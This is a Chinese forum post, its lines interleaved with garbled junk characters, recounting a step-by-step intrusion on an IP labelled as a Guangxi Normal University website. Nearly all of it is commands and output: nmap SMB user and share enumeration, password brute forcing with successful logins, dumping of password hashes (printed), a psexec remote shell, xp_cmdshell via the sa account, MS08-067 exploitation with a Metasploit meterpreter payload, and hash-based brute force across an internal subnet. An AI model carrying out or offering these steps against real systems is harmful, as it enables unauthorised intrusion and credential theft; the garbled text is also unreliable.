广西师范网站http://202.103.242.241/8 B) ]- C, s* S8 ^
, G; X) J! ^2 Q3 o5 ^root@bt:~# nmap -sS -sV 202.103.242.241
/ y3 Z" j W& `9 }6 ?% a4 y4 `
, a" w# T* V" I; i( p u }3 Y' UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
$ @9 X8 F) i- v4 S( g- |
$ Y7 g( O+ d$ J+ Y% E9 \Nmap scan report for bogon (202.103.242.241)
# R D: Z& r8 J. r1 ?" \% e( `+ l8 I6 T5 _5 g, j; I
Host is up (0.00048s latency).
( `# }, d; ` l- N' d( T* X. K1 b
6 I% \- o$ o% D: m/ d) [ ]Not shown: 993 closed ports/ k8 c' b+ h3 u7 v0 L
0 x( q" S! B9 k5 p' }5 G
PORT STATE SERVICE VERSION. s) t/ q% `/ H/ T' N, w9 g
9 {2 X3 I+ c+ T" ~* E% z( f8 x
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
; d! b) j, r# x Z" n# K- O' m3 _- p* U1 N
139/tcp open netbios-ssn1 C4 f8 w j' H% L: v! y9 C9 n* w9 k
; Q6 p( `3 A6 ^& b/ s: o- U445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
4 ]7 ^* q3 ]# c9 G# w3 r! j' N% e8 ~& ?7 Y# D/ {# } M. p
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)2 t+ _$ v: t' L9 R1 g7 p0 y
. x' n. u4 ^" V5 d1026/tcp open msrpc Microsoft Windows RPC8 I& n* }* {3 ?# w+ M$ Z
9 m- V/ F; U5 `' H! H1 I4 }$ \3372/tcp open msdtc?0 a1 E" v( s3 @ h$ a6 P
% V* P; d5 Y1 ]) i" K& _. g
3389/tcp open ms-term-serv? g* z7 W' B5 I) x; Q+ l- o! J
, h7 N" \1 v' }3 e& N- B
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
( g) j' h" a# J6 }: Z9 N6 g" qSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r% O; F6 L5 O+ R8 g$ x" [$ f
- _! Z! e v9 f5 w# X8 h H( oSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
( v& C1 h) G0 \6 E) F
8 j! n% J3 M5 pSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
4 p/ ?; u; y/ B% d
2 F! [+ |* T$ X! mSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO' I4 V0 P/ M9 F0 Q& V$ H' E- U. m$ f
9 c! S: d+ W2 T# h1 ^/ iSF:ptions,6,”hO\n\x000Z”);
4 b9 Q9 R/ A3 I1 j; k: Y& S
3 W+ y2 s& m7 O0 ?; DMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 `) V& K5 h' p7 ~( j2 H' ~3 X4 p3 R6 Z F
Service Info: OS: Windows+ z# E: _1 b! c8 |2 R& ]
! \/ V: m) T* H% Q" M) vService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
. U9 R- \& Q( z$ b) |# Z7 g3 \
4 ]! ~ J% X# n7 ]( |& ]' L$ RNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
! ^! R* { K/ X+ a8 J$ z& i, w: Q' @- A4 M# [ a9 ~, _
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本+ q% R' j4 p4 \$ D, a/ B
2 M' b9 V3 G- D. _) B5 y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse Y; F0 A) P! H7 q* A# f# s
1 m Y" ]$ z- J# H$ f I8 X# g+ I-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
- w8 G2 }0 Q! K0 T; I" J% E- c$ U$ P+ X1 _0 H
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse; r; ^$ E/ R0 I* I2 J4 F
& k) q2 _5 o% n9 A# K1 J% t-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse, ?, ~( X$ v3 q7 T( Z
G( \* w" ^/ l: v/ r-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 Y' B! f% X/ A9 o
9 F1 S# v/ s- [9 S; x5 i
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse! [3 s# v' r# U! [- }: l+ ]: W
( r: d9 A) P* R- r! h% ?/ u. A) k
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse5 X$ |. {/ k0 [ u# e2 R$ {
8 W4 v+ n. k, l1 ~' m-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
$ O, ~3 B8 K6 p) r b4 u" G4 t8 g* I o5 O0 {
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse2 E/ H' |7 V' T! s
! ~/ T! M9 P& o' g- W* K-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse: y1 M8 F8 a4 n. S, F5 V' F& V! |
* C* W$ L- X. p8 s-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse2 w7 y+ }% g- C _
+ R) t0 k- V: D4 C W% J
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
2 N; h0 s g. |5 ~& C' f7 j
* I) s5 s( \5 k" k; L5 b L; k% q. ?0 z+ }-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse# }& a* i/ W; z+ R2 H4 T( q
3 p7 k+ M# Y* O
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
3 Q$ `$ g4 `: z, C+ e. d
8 j; Z$ S6 o! |, X4 @, X-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
L0 C# w+ {7 V& D/ L3 \& x& Y
1 U9 R% j/ w( x8 n" G, @6 P" c6 ?root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ V2 n4 D% U/ W8 u, e9 u
3 m T$ o' ?" M7 z- f( V//此乃使用脚本扫描远程机器所存在的账户名
' I# j1 I! S( Y9 i7 s! Z) [! N$ @% M8 s+ |# _8 p. W; L
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST" s% d8 `( o+ j# U
- o K* p r* ]: _" ~% K; ~Nmap scan report for bogon (202.103.242.241)
, E2 t: q8 q: E: X% F
1 x; U) H' \/ M9 \( iHost is up (0.00038s latency).* k: B3 g) n. j, K+ @ p; P: m/ R
2 {8 {3 R" d+ ?
Not shown: 993 closed ports
0 W* n. |; k) H. @7 U9 r' S, [1 M2 K, A, Q. D: [+ Z
PORT STATE SERVICE
& s) x' r' E, H( p7 Y) p5 g1 z7 s1 t- e; a+ P- o! H: Z; \& {
135/tcp open msrpc
: }# S- _* a. |, c9 D! E1 ?
( O! y8 g6 B( u139/tcp open netbios-ssn6 e2 l7 w- B- E; w9 p# x
1 x: e/ e5 ?/ U0 _! R2 P" }* W
445/tcp open microsoft-ds! u: O% A# g. z& s
: O! a/ W6 k7 |
1025/tcp open NFS-or-IIS
( r i2 ~& i* ^" F/ p/ {' {
/ R7 @6 P6 v) S1026/tcp open LSA-or-nterm1 N) [6 @, m# {6 v9 N0 |
- ~, M- U% P7 |/ a4 m: x3372/tcp open msdtc
: b9 [" e- K# J# [( I7 U) E- W |
3389/tcp open ms-term-serv2 g) A* { ], B3 L
) }" K/ R2 z: XMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 `8 c5 G( Y7 z% j: A4 N3 h9 K: [) ]2 A
Host script results:% E* D) U7 X9 G6 O* S. @
& A' K7 R8 ~, J i3 u# j' F
| smb-enum-users:# Z2 |9 Z6 ?0 y; F* t! \/ Y
, ?" A, w6 L( r7 {& X X|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果( Y+ J5 w0 s9 c0 N$ H
' S/ ~5 w3 r/ y2 H' ~6 Y$ S
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds x9 W/ D$ f, C5 D) b9 f# d
% t/ {6 k. a$ G. g# W7 ` Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
) C6 R: e* G2 r
( ]- e( U8 W4 w; O' S1 u& Y C+ R: F& v//查看共享
+ a: `4 `1 g: {- k, b: R }2 v# y# C; h# r# e& r% B& d# A
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST/ B+ [& T* J9 Q2 A9 C! W
* C+ y; Q2 A& D2 y1 l: b6 ]
Nmap scan report for bogon (202.103.242.241)
. t2 ^5 A4 V0 M7 H) D
H) _6 D; ?0 g+ N; V& i* }Host is up (0.00035s latency)." I% c; g! `! P. F- `
T! Z" m" y! _, f+ l# W
Not shown: 993 closed ports8 ^) t2 @; O3 e, g6 j; f
: J8 ^8 j. O) [. D, o3 Q2 nPORT STATE SERVICE
! X$ c9 z* O1 ?& T1 B* Y/ P
9 B- E! t* C4 a: T135/tcp open msrpc6 `4 t7 m1 Z L6 a
9 c) Q' K6 {0 u. N3 a+ T
139/tcp open netbios-ssn
# Q- g! |( {; |8 X2 W6 ] u& Z. W; p' j& R! H" S4 U0 I: j
445/tcp open microsoft-ds
' u& a3 p: w" {" L7 I
0 T9 D1 T7 n- N1 a5 ]1025/tcp open NFS-or-IIS( k4 A) ^/ c8 g7 k+ L
# X4 h1 A5 u" }& e, `- @1026/tcp open LSA-or-nterm* c3 i( t& E: K9 B4 i9 i" V
! ?" i0 Y, v Z6 V
3372/tcp open msdtc
. U7 p' Q! D8 Q4 {' o2 ]! G q5 }7 F- ]
3389/tcp open ms-term-serv
/ I$ p* k+ b0 {( l1 `) E, ]/ ?! k$ \# Z0 I5 y7 j. T
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; Z& Z! {+ x) A/ o$ w# b7 W1 @9 P9 d1 ^- h( |* U
Host script results:* A" w+ b3 o9 v4 @
0 L' N0 ?$ K8 w+ \
| smb-enum-shares:
# ?" [- T: d8 \9 E( a. b: [
( f, f; K0 f% T5 P| ADMIN$) l" F U7 Y7 f, r) ^ m5 Y' h
; h( G4 W; Y/ ^* @| Anonymous access: <none>
$ F; W) V! V0 O9 j
- l1 |9 B/ Q1 ^3 |+ @| C$
+ o( X: ^! A! `2 g0 S* d5 [0 e& T
. d2 B' ?! d& K, P) U* S5 e$ h; o| Anonymous access: <none>
! z4 [: \7 z' j; V1 A
2 J/ C4 p5 Z8 r4 {' i| IPC$) w1 @/ @4 N5 d' F
0 w& s) o5 g4 O! h. x0 ^
|_ Anonymous access: READ+ Y3 c1 i# ]1 x
, v$ F/ X2 ^! T/ QNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
* N" i5 a- Y/ m' K. E$ j6 {' w& a ?* ~2 | r; M
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ; I V; X; h+ R* E8 \ t( [- ^
: N. r+ k- H) W//获取用户密码5 O5 @: _% ]8 ~
) R/ h( t* u# ~1 w
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
+ A: |; @3 T4 }4 ?# \% S7 q) e Q1 l' j# B1 S
Nmap scan report for bogon (202.103.242.2418); U0 q) H4 y2 @4 Q0 Y! j
2 N' O( d) V7 n d) E" O4 B5 S2 DHost is up (0.00041s latency).7 u9 K" m% s! b! V3 H! h
' t( Q, Z9 r( r6 Z4 ~- n
Not shown: 993 closed ports4 q) A, u/ I, U8 s4 `
- t/ N i/ _& c N# R' X3 [PORT STATE SERVICE
& S# O- f4 E# N e$ l7 ~
1 G5 l- S" z: ?: |+ c135/tcp open msrpc
) Y" |' W' J a! X* j0 p4 v% q" N* G% q/ d2 i# t F# z R5 }9 G
139/tcp open netbios-ssn' w% P( h8 }7 [
6 t2 J$ V; x% i# Q1 D8 K
445/tcp open microsoft-ds* |0 N7 H1 C- }' t5 s H: f! Q% }
& `( s6 s+ {- c4 t! I) g/ f1025/tcp open NFS-or-IIS
4 C6 i$ g/ d' M9 r, w, N2 w/ G( h' H4 \+ n! D
1026/tcp open LSA-or-nterm- M r% f7 h$ A$ y+ V l
! J0 y" y7 P$ h
3372/tcp open msdtc
! D& C) R! Q9 Z; E: `( y2 g5 b2 a1 ~
3389/tcp open ms-term-serv1 q' n ~8 X; d* l% h: n) y9 f
- i0 Y5 A2 r; p/ I7 q$ r( j" fMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) |( C, H0 z# M/ F8 f7 p: t8 x2 k
U5 t9 g! W7 m( [0 V
Host script results:
/ g( l; p. c! B$ T0 L2 n
# B" e6 E6 r! }# K6 X0 K7 q( y| smb-brute:
3 I% f; p, u* F1 O- R! ~4 b! v1 N: x
administrator:<blank> => Login was successful: g, G0 X$ ^/ k8 Q
2 u5 J4 J, i! W5 ^1 Y4 X! y
|_ test:123456 => Login was successful6 S$ A% Q0 D) u0 o, _' \
9 k# w+ @& J" _5 }6 FNmap done: 1 IP address (1 host up) scanned in 28.22 seconds8 N- U. j* p3 P, |& C# j
( X1 z1 p2 u1 h
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash/ N0 c: h _) p7 } A; x% ^, b
8 k% O# i) l" F3 S0 l; }, _1 h
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
0 m0 i8 X; w& l* A. D
3 ^7 ^* U6 d# {/ Z, |6 v& I: ?root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse1 B/ r' t; O9 c( P9 s4 b
* G' t4 }* S" p* o' mroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139% i3 U4 p; }- o$ w/ z; W3 ]
8 |7 X1 s. g3 v. w, v
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST9 D& k5 t8 G9 i' t ?
- u. p7 Y2 `0 u; fNmap scan report for bogon (202.103.242.241)
9 l4 g8 y: G w3 z
+ L$ t4 `" @& M2 P xHost is up (0.0012s latency).# s; D8 j& ^7 b; n
: n1 m: C$ A1 {: [% n3 pPORT STATE SERVICE
1 j, N) `/ h6 k4 u$ [0 E, n# [: j( D8 D% A2 | j' j# e' c
135/tcp open msrpc8 y* b! p. o& a7 Y/ F
- V7 P8 [: c# q" |7 D139/tcp open netbios-ssn* I) Y2 Q( [/ g8 I
1 c# k" b1 P n: G3 I+ j+ N% \
445/tcp open microsoft-ds
% A$ n! }% A; K0 ^; i+ F
" l' V1 c! z: L7 GMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% b+ w; e' O6 P5 u1 H1 r' B) x6 m! K% V) s2 w U
Host script results:
7 ^. U# \+ X) f" r' v
, M; L/ `; j/ l& d9 ?+ K* K| smb-pwdump:
, G& b2 P. t( |5 T
2 g N# a, U; c1 Q7 {; F9 P/ j| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************- `2 r1 P, b$ ~# l7 E" w1 E/ [
3 Z) x, M4 d. A. K
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
6 N! Z- j$ N. [; h3 M: B* P" B
) i, @) |9 D+ E6 I# {. c& t2 w| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
+ K. Q& i2 s3 N" G# |2 p
- u$ S6 O) A4 r|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2- h7 E. r3 K6 e8 b4 h) o6 x3 c; v' M
7 @* _- H; s5 G. E( I( S; p* b
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds2 P+ A8 ~$ C+ Z' s" i
0 z# G% J9 X2 v7 D7 k0 \
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell' @. F L: M% c2 x) I8 k" b
, P. l2 A' n9 X' B+ e# X6 s) V' O7 Y# N
-p 123456 -e cmd.exe+ s% K" W9 P% {8 O; `+ V
! T3 R5 X8 d' m6 M- o z# f2 R
PsExec v1.55 – Execute processes remotely
V* w+ A0 r& o' ?( C
6 Q' O }/ v- z% X" Y' XCopyright (C) 2001-2004 Mark Russinovich8 {1 U# D/ J+ C9 k D! ?2 N/ |
* O: U6 S' H, x
Sysinternals – www.sysinternals.com
; C% ^) l" O' l* @( {( i/ u5 B: [7 Y8 q5 A
Microsoft Windows 2000 [Version 5.00.2195]4 J. q2 H$ i- |5 r8 C! `- _
7 q. _6 D% W2 M+ _ j(C) 版权所有 1985-2000 Microsoft Corp.
8 t( M, J* _; \* r% M9 |; x1 ^1 ~2 w" Q$ s( V) O
C:\WINNT\system32>ipconfig1 W6 A& f% d3 a8 C, D4 m: t8 T+ f! a8 p
& J; ?* G; w0 ]% g! y3 e
Windows 2000 IP Configuration w- b) H3 E( G" a( j/ X2 {
: W% C- ]9 i9 s, nEthernet adapter 本地连接:
" v' y, K% z4 o; t
% w- F5 e0 L3 e5 `9 o3 IConnection-specific DNS Suffix . :
$ X1 N# {# c/ i, n0 @7 P, m
& r$ P! d0 ?1 h1 Y2 O9 pIP Address. . . . . . . . . . . . : 202.103.242.241
9 b; q' `4 _ e3 B& N; l" Q j# s3 E+ ^( |
Subnet Mask . . . . . . . . . . . : 255.255.255.0) v* P. R8 O: \: C/ s
7 L- t3 h8 u- r ]+ a
Default Gateway . . . . . . . . . : 202.103.1.17 o5 h( p3 m L( P9 v
1 C* s' y1 p2 D+ b
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
7 a+ H6 g" z- l* D9 @6 L% |: \/ R; u0 T
" w, r/ l% c" hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞' i3 P( s- }' j3 a/ ]
q: {6 Z# Y5 ?, @- YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST: F* l* \" C: _
$ b, z2 z4 p$ t3 ]+ bNmap scan report for bogon (202.103.242.241)
P& b* I9 v4 D4 n2 C- v
( s3 ~+ V9 n& x7 fHost is up (0.00046s latency).: _* \5 Q d' Z' M( u/ N0 ~
6 E. e$ n4 e+ L
Not shown: 993 closed ports
! p2 H) W R2 u- z2 j9 M: f
* |3 y* t) U) M; kPORT STATE SERVICE
& f7 V2 f3 F1 M2 j# P
4 x# _4 ~- u2 ]+ c+ t135/tcp open msrpc4 S! [# k; a! j: \8 H3 H$ \
0 ~+ L/ u& m6 S7 I* n2 y
139/tcp open netbios-ssn. J0 R$ u/ j' s; i5 d) K
8 l6 _1 ?2 d) Y4 W445/tcp open microsoft-ds+ @/ M" L3 Z3 s* A% A5 X$ f
# E# z3 l8 t3 u3 [2 m2 k/ c, r, j1025/tcp open NFS-or-IIS8 N8 N1 m% o2 S" t3 s
, X. j! h; D8 Y; m" ]1026/tcp open LSA-or-nterm7 o$ Q/ c4 q8 i7 w% a5 d- |
2 k) u& u+ W8 t5 i M# Q; @
3372/tcp open msdtc7 m {$ G t2 B e# a" d
, @2 e2 Q; b- W* J- d
3389/tcp open ms-term-serv7 g# V5 m% |/ u5 N$ k6 P$ m9 c
0 d6 ]. g2 @0 i4 s$ A, h3 Q! {" M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* w* _1 O" r6 J6 q( {$ e& c
. n1 n0 r) ]3 X/ J/ u. o) ~Host script results:1 s: J& J1 o% x0 l
4 Q6 q! W: m+ A
| smb-check-vulns:$ C6 H1 c$ a% W
/ k5 n4 a/ b8 W
|_ MS08-067: VULNERABLE
9 P Z9 Q' E* O" V2 \
& Y4 x$ E# E2 tNmap done: 1 IP address (1 host up) scanned in 1.43 seconds' Y9 R6 L _" a' h% F( r0 f) B
% ^ Q8 ?0 ~' X. Lroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
1 S6 T% P: X4 q! u+ \" [" _6 B8 {& ?" H( h& `- g9 O
msf > search ms08* G9 E8 @, H3 y
' K4 q% j8 D9 s, d/ K0 c) rmsf > use exploit/windows/smb/ms08_067_netapi
9 ^3 `4 p. R( {1 p) g+ R+ _4 H
- m/ Q+ D) y. a( @0 emsf exploit(ms08_067_netapi) > show options
/ w) N$ R( _& W- l0 |4 m" s# H! }1 e; o
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2417 l: \: M$ ^* E% M2 L( Q
* x% `: f B7 ?& D2 [msf exploit(ms08_067_netapi) > show payloads' Z X0 `- z3 b, n- y' B. E. l
9 B6 s3 S* V# ] Kmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
$ f& [7 Y+ S& y+ f" L; g
$ I1 O/ ?( I% O' jmsf exploit(ms08_067_netapi) > exploit
4 f1 \+ F, f3 ^3 {( \$ x0 O. g3 h4 T- ]% n" K- V9 }
meterpreter >
1 b2 U8 {8 N, f X' _) U. @' f. C4 K: q" U# n' C
Background session 2? [y/N] (ctrl+z)
( ?4 J/ q! q) D6 }& Y% u- V4 `
$ W" z' i" t( _1 ~msf exploit(ms08_067_netapi) > sessions -l
/ O K) m4 d9 L' d% u# k. m9 G7 t: n4 v5 o
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt, ]- E. I4 s/ T7 u- j- ^, B- k
6 P3 \; o" x" C/ c1 J ctest* n' y- Z/ L! E* p* G" B5 ^2 i
. j+ J" Q. G: a( K. [
administrator1 A/ s ^; i4 s# T' v2 N& R& i, @9 H
2 _5 i& k2 I8 L& Q: g) Z8 i! A. Z
root@bt:/usr/local/share/nmap/scripts# vim password.txt! f8 L. v* o% x' T8 e& y
5 t0 j; ~3 J: @# K/ E, _44EFCE164AB921CAAAD3B435B51404EE4 H# y, Z* a, L5 |
k8 S. Y: r2 C& [) R" w
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
! b6 ^ p/ X( y' y. e% |; A% f$ e$ o& G
//利用用户名跟获取的hash尝试对整段内网进行登录
( J7 v3 J4 Q+ s3 r# P0 [" s1 R" ^' o: H9 S; [. i5 P
Nmap scan report for 192.168.1.105
3 u9 J" [6 Q2 i: Z0 `4 B. j
) P0 E8 U- ^4 Q, H) G& pHost is up (0.00088s latency)." u7 Y3 _. s/ H1 S
- N* M5 @) ^. D( {& ^
Not shown: 993 closed ports# @3 J; c9 A- e5 l5 Q& j( j4 L+ N+ g
) h- K7 o$ x8 N0 k f q" L* CPORT STATE SERVICE
$ ]% h$ c" @) C3 I: w4 }) J& p; p0 ~7 P: m" P8 L3 z0 Q
135/tcp open msrpc$ v4 z0 X1 \$ X& y/ w
0 }1 t. S Y# t( D: I4 u2 I: @139/tcp open netbios-ssn
d) a1 B. w' G/ h, \; Q6 r9 }9 s( o# l" C6 U2 Q5 D3 m
445/tcp open microsoft-ds
( T( _. _; a) w: r1 o$ ?' ^+ B, j- n* g
1025/tcp open NFS-or-IIS# w2 r% i! a6 ~5 f! z
5 g5 m) K# l5 P) b$ {1 B
1026/tcp open LSA-or-nterm
) l" p5 p1 M5 u" y9 D* ~6 f
- |0 L; d) \( M q1 ~+ @3372/tcp open msdtc
1 i. E* m! z" z6 x o( \' i8 C% i; R
3389/tcp open ms-term-serv
& }4 E J; w+ h- U/ g! k( p( {3 r5 M. @" I4 y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- m% O1 C; P; M$ P6 y4 p, B
+ j+ P5 f( m4 X1 x& R) U0 O3 M
Host script results:
6 c. V/ O: M0 J6 l* a# X0 H4 c$ h9 L3 e; u3 t8 I. T. L J
| smb-brute:
8 T! ]0 T% d$ D6 a% O; ?" ?; B3 V$ P# B0 Z9 C1 ^
|_ administrator:<blank> => Login was successful
% w) ^) d3 {$ e$ _+ z: D
" |5 _ r1 A; T- Q攻击成功,一个简单的msf+nmap攻击~~·0 \3 D3 F/ B4 b$ x% y! G
; n ^% j7 j j- c' j
|
发表于 2012-12-4 12:46:42
收藏
支持
反对